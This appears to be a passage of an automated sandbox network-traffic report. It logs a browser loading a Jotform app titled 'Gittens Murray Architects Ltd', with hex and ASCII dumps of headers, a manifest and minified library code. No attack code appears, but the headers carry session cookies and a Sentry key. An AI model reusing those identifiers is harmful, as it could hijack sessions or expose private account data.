                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 50 61 79 6d 65 6e 74 52 65 75 73 61 62 6c 65 46 6f 72 45 6e 74 65 72 70 72 69 73 65 22 3a 66 61 6c 73 65 2c 22 61 69 53 75 70 70 6f 72 74 41 67 65 6e 74 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 6c 64 65 72 53 74 72 75 63 74 75 72 65 41 76 61 69 6c 61 62 6c 65 22 3a 66 61 6c 73 65 2c 22 69 73 4e 65 77 46 6f 72 6d 54 72 61 6e 73 66 65 72 45 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 74 65 61 6d 73 42 65 74 61 55 73 65 72 22 3a 22 30 22 2c 22 61 6c 6c 6f 77 45 6e 63 72 79 70 74 69 6f 6e 56 32 22 3a 74 72 75 65 2c 22 69 73 46 6f 72 6d 42 75 69 6c 64 65 72 4e 65 77 53 68 61 72 65 22 3a 66 61 6c 73 65 2c 22 6f 66 61 63 55 73 65 72 22 3a 66 61 6c 73 65 2c 22 69 73 53 75 70 70 6f 72 74 65 72 73 41 6c 6c 6f 77 65 64 54 6f 4c 6f 67 69
                                                                                                                                                                                                                                            Data Ascii: PaymentReusableForEnterprise":false,"aiSupportAgentEnabled":false,"isNewFolderStructureAvailable":false,"isNewFormTransferEnabled":false,"teamsBetaUser":"0","allowEncryptionV2":true,"isFormBuilderNewShare":false,"ofacUser":false,"isSupportersAllowedToLogi


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            72192.168.2.1749784104.19.128.1054435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC768OUTGET /app/250092704521347/manifest.json HTTP/1.1
                                                                                                                                                                                                                                            Host: eu.jotform.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                                            Referer: https://eu.jotform.com/app/250092704521347
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            Cookie: guest=guest_5a3c5173c0bb4f63; JOTFORM_SESSION=62953b85-a26b-4264-9cab-272a8b54; userReferer=https%3A%2F%2Feu.jotform.com%2Fapp%2F250092704521347
                                                                                                                                                                                                                                            If-Modified-Since: Fri, 10 Jan 2025 12:36:00 GMT
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1264INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                                                            p3p: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            jf-trace-id: d0a6863021ab4fb2
                                                                                                                                                                                                                                            strict-transport-security: max-age=31536000;
                                                                                                                                                                                                                                            content-security-policy-report-only: default-src https: data: blob: wss: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' *.jotfor.ms https://js.jotform.com/actions.js https://www.googletagmanager.com https://consent.cookiebot.com https://consentcdn.cookiebot.com https://static.olark.com https://knrpc.olark.com/nrpc/ https://js-agent.newrelic.com https://browser.sentry-cdn.com https://js.sentry-cdn.com https://edge.fullstory.com https://rs.fullstory.com; report-uri /opt/csp-violation-report.php
                                                                                                                                                                                                                                            expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                                            Set-Cookie: guest=guest_5a3c5173c0bb4f63; expires=Mon, 10 Feb 2025 12:36:17 GMT; Max-Age=2678400; path=/; domain=.jotform.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            global-router: true
                                                                                                                                                                                                                                            x-raw-uri: /app/:appID/manifest.json
                                                                                                                                                                                                                                            via: 1.1 google
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb6389be33350-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC105INData Raw: 37 36 62 0d 0a 7b 22 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 73 68 6f 72 74 5f 6e 61 6d 65 22 3a 22 47 69 74 74 65 6e 73 20 4d 75 72 72 61 79 20 41 72 63 68 69 74 65 63 74 73 20 4c 74 64 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22
                                                                                                                                                                                                                                            Data Ascii: 76b{"name":"Gittens Murray Architects Ltd","short_name":"Gittens Murray Architects Ltd","description":"
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 53 63 61 6e 6e 65 64 20 46 72 6f 6d 20 3a 20 4d 50 44 36 30 39 5c 6e 22 2c 22 73 63 6f 70 65 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 22 2c 22 73 74 61 72 74 5f 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 6f 74 66 6f 72 6d 5f 70 77 61 22 2c 22 64 69 73 70 6c 61 79 22 3a 22 73 74 61 6e 64 61 6c 6f 6e 65 22 2c 22 74 68 65 6d 65 5f 63 6f 6c 6f 72 22 3a 22 23 66 66 66 66 66 66 22 2c 22 62 61 63 6b 67 72 6f 75 6e 64 5f 63 6f 6c 6f 72 22 3a 22 23 30 41 31 35 35 31 22 2c 22 69 63 6f 6e 73 22 3a 5b 7b 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d
                                                                                                                                                                                                                                            Data Ascii: Scanned From : MPD609\n","scope":"\/app\/250092704521347","start_url":"\/app\/250092704521347?utm_source=jotform_pwa","display":"standalone","theme_color":"#ffffff","background_color":"#0A1551","icons":[{"src":"https:\/\/eu.jotform.com\/uploads\/Gittens_M
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC432INData Raw: 5c 2f 5c 2f 65 75 2e 6a 6f 74 66 6f 72 6d 2e 63 6f 6d 5c 2f 75 70 6c 6f 61 64 73 5c 2f 47 69 74 74 65 6e 73 5f 4d 75 72 72 61 79 5c 2f 66 6f 72 6d 5f 66 69 6c 65 73 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5f 6d 61 69 6e 50 57 41 49 63 6f 6e 2e 36 37 38 31 30 30 65 31 65 34 33 31 63 2e 70 6e 67 3f 77 69 64 74 68 3d 35 31 32 26 68 65 69 67 68 74 3d 35 31 32 26 74 69 6d 65 3d 31 37 33 36 35 30 37 37 31 37 22 2c 22 73 69 7a 65 73 22 3a 22 35 31 32 78 35 31 32 22 2c 22 74 79 70 65 22 3a 22 69 6d 61 67 65 5c 2f 70 6e 67 22 7d 5d 2c 22 73 68 6f 72 74 63 75 74 73 22 3a 5b 7b 22 6e 61 6d 65 22 3a 22 50 61 67 65 22 2c 22 75 72 6c 22 3a 22 5c 2f 61 70 70 5c 2f 32 35 30 30 39 32 37 30 34 35 32 31 33 34 37 5c 2f 70 61 67 65 5c 2f 30 3f 75 74 6d 5f 73 6f 75
                                                                                                                                                                                                                                            Data Ascii: \/\/eu.jotform.com\/uploads\/Gittens_Murray\/form_files\/250092704521347_mainPWAIcon.678100e1e431c.png?width=512&height=512&time=1736507717","sizes":"512x512","type":"image\/png"}],"shortcuts":[{"name":"Page","url":"\/app\/250092704521347\/page\/0?utm_sou
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            73192.168.2.174978634.120.195.2494435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC476OUTGET /api/5223511/envelope/?sentry_key=36d29a013f8a4bd7adfe310f5fe4d75a&sentry_version=7&sentry_client=sentry.javascript.react%2F8.34.0 HTTP/1.1
                                                                                                                                                                                                                                            Host: o61806.ingest.sentry.io
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC290INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                            Content-Length: 548
                                                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                            Via: 1.1 google
                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            74192.168.2.1749785104.22.72.814435732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC386OUTGET /s/portal/674ac14411e/static/js/6158.c797260a.js HTTP/1.1
                                                                                                                                                                                                                                            Host: cdn03.jotfor.ms
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC429INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Fri, 10 Jan 2025 12:36:17 GMT
                                                                                                                                                                                                                                            Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                            Content-Length: 827005
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            expires: Fri, 10 Jan 2025 13:22:24 GMT
                                                                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                            last-modified: Fri, 10 Jan 2025 12:20:44 GMT
                                                                                                                                                                                                                                            etag: "c18baa1158c442ee57107e746d05174a"
                                                                                                                                                                                                                                            x-store: gcs
                                                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                                                            Age: 279
                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8ffcb63a9cbe8c51-EWR
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC940INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 65 2e 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 35 31 30 36 31 66 39 31 2d 62 30 61 33 2d 35 62 64 33 2d 61 65 32 31 2d 33 64 34 61 63 35
                                                                                                                                                                                                                                            Data Ascii: "use strict";!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new e.Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="51061f91-b0a3-5bd3-ae21-3d4ac5
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 62 29 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 33 37 33 2c 68 65 69 67 68 74 3a 31 36 2c 78 3a 31 32 35 2c 79 3a 35 37 2c 72 78 3a 38 2c 73 74 79 6c 65 3a 7b 66 69 6c 6c 3a 22 75 72 6c 28 23 63 61 72 64 49 74 65 6d 50 6c 61 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 61 29 22 7d 7d 29 29 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 67 22 2c 7b 63 6c 69 70 50 61 74 68 3a 22 75 72 6c 28 23 63 61 72 64 49 74 65 6d 50 6c 61 63 65 68 6f 6c 64 65 72 5f 73 76 67 5f 5f 63 29 22 7d 2c 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 72 65 63 74 22 2c 7b 77 69 64 74 68 3a 32 32 37 2c 68 65 69 67 68 74 3a 31 36 2c 78 3a 31 32 35 2c 79 3a 33 33 2c 72 78 3a 38
                                                                                                                                                                                                                                            Data Ascii: ceholder_svg__b)"},i.createElement("rect",{width:373,height:16,x:125,y:57,rx:8,style:{fill:"url(#cardItemPlaceholder_svg__a)"}})),i.createElement("g",{clipPath:"url(#cardItemPlaceholder_svg__c)"},i.createElement("rect",{width:227,height:16,x:125,y:33,rx:8
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 3d 61 28 22 33 32 33 35 38 22 29 2c 63 3d 61 28 22 32 37 32 31 39 22 29 2c 68 3d 61 28 22 35 39 32 30 31 22 29 2c 6d 3d 61 2e 6e 28 68 29 2c 76 3d 61 28 22 33 36 33 33 33 22 29 2c 5f 3d 61 28 22 39 35 34 37 34 22 29 2c 78 3d 61 28 22 32 32 37 32 32 22 29 2c 67 3d 61 28 22 34 35 30 35 30 22 29 3b 63 6f 6e 73 74 20 62 3d 61 28 22 31 31 37 35 39 22 29 2e 5a 50 2e 64 69 76 60 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 2d 2d 6d 69 78 20 2e 74 61 67 69 66 79 5f 5f 69 6e 70 75 74 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 7b 0a 20 20 20 20 20 20 74 61 67 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a
                                                                                                                                                                                                                                            Data Ascii: =a("32358"),c=a("27219"),h=a("59201"),m=a.n(h),v=a("36333"),_=a("95474"),x=a("22722"),g=a("45050");const b=a("11759").ZP.div` div.jfTagInput .tags-input .tagify--mix .tagify__input { padding: 0; } .tags-input { tags { border: none;
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 63 6f 6c 6f 72 3a 20 72 67 62 28 31 30 20 32 31 20 38 31 20 2f 20 31 30 25 29 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 5f 5f 74 61 67 20 7b 0a 20 20 20 20 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66 79 5f 5f 74 61 67 20 3e 20 64 69 76 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 63 33 33 34 35 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 7d 0a 20 20 64 69 76 2e 6a 66 54 61 67 49 6e 70 75 74 20 2e 74 61 67 73 2d 69 6e 70 75 74 20 2e 74 61 67 69 66
                                                                                                                                                                                                                                            Data Ascii: color: rgb(10 21 81 / 10%); } div.jfTagInput .tags-input .tagify__tag { height: 25px; } div.jfTagInput .tags-input .tagify__tag > div { background: transparent; color: #2c3345; display: flex; } div.jfTagInput .tags-input .tagif
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6c 6c 3d 3d 3d 28 74 3d 4e 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 74 7c 7c 6e 75 6c 6c 3d 3d 3d 28 65 3d 74 2e 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 52 65 66 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 65 3f 76 6f 69 64 20 30 3a 65 2e 63 75 72 72 65 6e 74 3b 61 26 26 6a 28 61 29 7d 29 2c 5b 74 2c 61 5d 29 3b 63 6f 6e 73 74 20 52 3d 28 30 2c 6c 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 28 7b 74 61 72 67 65 74 3a 65 7d 29 3d 3e 7b 6a 28 65 29 7d 29 2c 5b 61 5d 29 2c 42 3d 28 30 2c 6c 2e 75 73 65 43 61 6c 6c 62 61 63 6b 29 28 28 65 3d 3e 7b 65 2e 74 61 72 67 65 74 2e 69 6e 6e 65 72 54 65 78 74 2e 6c 65 6e 67 74 68 3e 3d 61 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 29 2c 5b 61 5d 29 2c 4f 3d 65 3d 3e 7b 77 69 6e 64
                                                                                                                                                                                                                                            Data Ascii: ll===(t=N.current)||void 0===t||null===(e=t.contentEditableRef)||void 0===e?void 0:e.current;a&&j(a)}),[t,a]);const R=(0,l.useCallback)((({target:e})=>{j(e)}),[a]),B=(0,l.useCallback)((e=>{e.target.innerText.length>=a&&e.preventDefault()}),[a]),O=e=>{wind
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6f 6e 4d 6f 75 73 65 44 6f 77 6e 3a 6b 2c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 64 2c 6f 6e 42 6c 75 72 3a 52 2c 22 61 72 69 61 2d 6c 61 62 65 6c 22 3a 45 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 29 7d 3b 79 2e 70 72 6f 70 54 79 70 65 73 3d 7b 63 68 61 72 61 63 74 65 72 4c 69 6d 69 74 3a 64 28 29 2e 6e 75 6d 62 65 72 2c 6f 6e 43 68 61 6e 67 65 3a 64 28 29 2e 66 75 6e 63 2e 69 73 52 65 71 75 69 72 65 64 2c 63 6f 6e 74 65 6e 74 45 64 69 74 61 62 6c 65 3a 64 28 29 2e 62 6f 6f 6c 2c 6f 6e 46 6f 63 75 73 3a 64 28 29 2e 66 75 6e 63 2c 70 6c 61 63 65 68 6f 6c 64 65 72 3a 64 28 29 2e 73 74 72 69 6e 67 2c 61 75 74 6f 46 6f 63 75 73 3a 64 28 29 2e 62 6f 6f 6c 2c 63 68 69 6c 64 72 65 6e 3a 64 28 29 2e 6f 6e 65 4f 66 54 79 70 65 28 5b 64 28 29 2e 65 6c 65 6d
                                                                                                                                                                                                                                            Data Ascii: onMouseDown:k,contentEditable:d,onBlur:R,"aria-label":E,children:t}))};y.propTypes={characterLimit:d().number,onChange:d().func.isRequired,contentEditable:d().bool,onFocus:d().func,placeholder:d().string,autoFocus:d().bool,children:d().oneOfType([d().elem
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 30 2c 68 2e 78 6d 29 28 6a 29 3b 28 30 2c 68 2e 6f 72 29 28 6a 2c 28 28 7b 6e 61 6d 65 3a 65 2c 70 61 79 6c 6f 61 64 3a 74 7d 29 3d 3e 7b 73 77 69 74 63 68 28 65 29 7b 63 61 73 65 22 61 70 70 46 6c 6f 77 52 65 61 64 79 22 3a 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 4a 46 20 41 70 70 73 20 69 73 20 72 65 61 64 79 2e 22 29 2c 54 7c 7c 43 7c 7c 62 28 28 30 2c 6d 2e 6b 42 55 29 28 7b 61 63 74 69 6f 6e 3a 22 66 6f 72 6d 56 69 65 77 65 64 22 2c 74 61 72 67 65 74 3a 7b 66 6f 72 6d 49 44 3a 6a 7d 7d 29 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 69 6e 69 74 41 70 70 46 6c 6f 77 22 3a 63 6f 6e 73 74 20 61 3d 66 26 26 28 30 2c 64 2e 54 76 29 28 50 29 3b 49 28 22 69 6e 69 74 4d 61 6e 61 67 65 72 22 2c 7b 75 73 65 72 3a 67 2c 66 6f 72 6d 49 73 43 6f 6d 70 6c 65 74 61 62 6c
                                                                                                                                                                                                                                            Data Ascii: 0,h.xm)(j);(0,h.or)(j,(({name:e,payload:t})=>{switch(e){case"appFlowReady":console.log("JF Apps is ready."),T||C||b((0,m.kBU)({action:"formViewed",target:{formID:j}}));break;case"initAppFlow":const a=f&&(0,d.Tv)(P);I("initManager",{user:g,formIsCompletabl
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 6f 70 73 3d 7b 66 6f 72 6d 50 72 6f 70 73 3a 7b 74 69 74 6c 65 3a 22 22 7d 2c 69 6e 74 65 72 61 63 74 69 76 65 3a 21 31 2c 69 74 65 6d 49 44 3a 22 22 7d 7d 2c 37 30 36 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 61 29 7b 61 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6d 7d 7d 29 3b 76 61 72 20 6f 3d 61 28 22 39 34 36 35 33 22 29 2c 69 3d 28 61 28 22 33 37 38 39 37 22 29 2c 61 28 22 32 37 32 31 39 22 29 29 2c 6e 3d 61 28 22 34 32 35 31 35 22 29 2c 72 3d 61 28 22 34 35 30 35 30 22 29 2c 6c 3d 61 28 22 32 38 31 36 33 22 29 2c 73 3d 61 28 22 31 31 37 35 39 22 29 3b 63 6f 6e 73 74 20 64 3d 73 2e 5a 50 2e 64 69 76 60 0a 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65
                                                                                                                                                                                                                                            Data Ascii: ops={formProps:{title:""},interactive:!1,itemID:""}},70624:function(e,t,a){a.d(t,{Z:function(){return m}});var o=a("94653"),i=(a("37897"),a("27219")),n=a("42515"),r=a("45050"),l=a("28163"),s=a("11759");const d=s.ZP.div` width: 100%; position: relative
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 29 2c 72 3d 61 28 38 31 38 38 35 29 2c 6c 3d 61 28 33 37 38 33 32 29 2c 73 3d 61 28 35 37 31 29 3b 63 6f 6e 73 74 20 64 3d 6f 2e 5a 50 2e 64 69 76 60 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 2f 2f 20 61 62 6f 75 74 20 61 70 70 48 65 61 64 65 72 42 67 20 49 6d 61 67 65 0a 20 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 6e 6f 6e 65 3b 0a 20 20 24 7b 28 30 2c 72 2e 63 29 28 6e 2e 44 54 2e 41 70 70 4c 6f 67 6f 53 69
                                                                                                                                                                                                                                            Data Ascii: ),r=a(81885),l=a(37832),s=a(571);const d=o.ZP.div` display: flex; flex-direction: column; align-items: center; position: relative; // about appHeaderBg Image overflow: hidden; box-shadow: none; border-radius: none; ${(0,r.c)(n.DT.AppLogoSi
                                                                                                                                                                                                                                            2025-01-10 12:36:17 UTC1369INData Raw: 2e 64 7a 29 28 29 7d 3b 5c 6e 5c 6e 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 74 61 62 6c 65 74 22 29 7d 3b 5c 6e 20 20 20 20 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 74 61 62 6c 65 74 22 29 7d 3b 5c 6e 20 20 20 20 20 20 7d 5c 6e 5c 6e 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 34 38 30 70 78 29 20 7b 5c 6e 20 20 20 20 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 24 7b 28 30 2c 73 2e 64 7a 29 28 22 6d 6f 62 69 6c 65 22 29 7d 3b 5c 6e 20 20 20 20 20 20 20 20 6d 69 6e
